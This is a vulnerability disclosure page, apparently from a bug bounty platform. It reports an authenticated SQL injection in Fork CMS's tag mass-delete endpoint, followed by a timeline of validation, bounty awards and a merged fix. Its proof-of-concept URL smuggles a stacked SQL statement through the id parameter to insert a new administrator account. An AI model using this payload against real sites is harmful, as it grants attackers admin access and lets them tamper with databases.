SQL Injection in forkcms/forkcms

Valid

Reported on

Oct 22nd 2021


Description

When calling the url for deleting one or more tags, the parameter id is vulnerable for SQL injection.

Proof of Concept

Call an URL like this one (as an authenticated user).

http://forkcms.site/private/de/tags/mass_action?token=n93e05rj0l&id[]=3);insert into users(email,password,is_god) values ('attacker@example.com','$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C',1);--+&action=delete

After calling this URL, the table users has a new entry.

Impact

The attacker can tamper data in the database as they want.

We have contacted a member of the forkcms team and are waiting to hear back 7 months ago
We have sent a follow up to the forkcms team. We will try again in 7 days. 7 months ago
Jelmer Prins validated this vulnerability 7 months ago
starkitsec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins confirmed that a fix has been merged on 0226a2 2 months ago
Jelmer Prins has been awarded the fix bounty
to join this conversation